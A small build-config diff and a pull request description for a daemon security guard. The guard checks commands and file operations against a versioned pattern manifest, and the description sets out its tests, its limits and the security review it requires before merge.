@@ -6,6 +6,7 @@ export default defineConfig({
     cli: 'src/cli.ts',
     'agent-identity-crypto': 'src/agent-identity-crypto.ts',
     'storage/index': 'src/storage/index.ts',
+    'tool-guard/sync-vendored': 'src/tool-guard/sync-vendored.ts',
   },
   format: ['esm'],
   dts: false,


### PR DESCRIPTION
## What

Adds a RevDev-native security pattern guard on the daemon request path, the native sibling of the Claude Code PreToolUse pattern scanner. Pattern data now lives in exactly one canonical manifest with two consumers: the daemon (this PR) and the PreToolUse hook (a vendored copy, changed in the private hooks repo).

## How

- **One manifest, typed loader.** `packages/daemon/src/tool-guard/patterns.json` (versioned) carries dangerous-command matchers, credential-path rules, blocked-write prefixes, protected env/lock file rules, and secret-content indicators. `patterns.ts` validates its shape at load and computes a stable content hash. Zero regex per the no-regex rule: substring/prefix data plus named character-boundary predicates.
- **Pure guard.** `tool-guard/index.ts` exposes `evaluateToolAction(action)` returning an allow/deny verdict for `command`, `read`, `write`, and `delete`. Wired into `file.read` / `file.write` / `file.delete` (path + content checks) and `agent.spawn` (command-class check that **composes with, never replaces**, the existing root-scoping + confinement).
- **Denials.** A distinct JSON-RPC error code (separate from the license guard's) plus an `events` row carrying the rule id.
- **Fail closed at startup.** `initToolGuard()` runs before the socket binds; an unloadable manifest refuses to start, mirroring the license guard.
- **Vendor sync + lockstep.** `sync-vendored.ts` writes the hook's vendored copy and prints the hash. A unit test pins `(version, hash)` so a pattern edit that forgets the version bump fails the build.

## Scope honesty

The guard covers what flows **through the daemon**. PTY-internal tool calls a foreign harness makes are out of scope (the guard is a pure function so the same entry point applies if the native runtime later gains its own tool loop). `git.*` handlers are intentionally not path-guarded: they are structured and root-confined, and a secret-path check there would regress legitimate repo files (e.g. a project's own `.npmrc`).

## Tests

Per-category block + allow (command/read/write/delete), a manifest-corruption refuses-to-start test, `validateManifest` corruption cases, matcher word-boundary fidelity, secret-token fidelity, and the hash/version lockstep. Full `@revdev/daemon` suite green (665 tests). `pnpm lint` and `pnpm typecheck` clean.

## Security review

This PR touches daemon security surfaces (spawn + file I/O request path). **It requires a recorded security verdict before merge** per the review-before-merge gate; do not self-merge.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
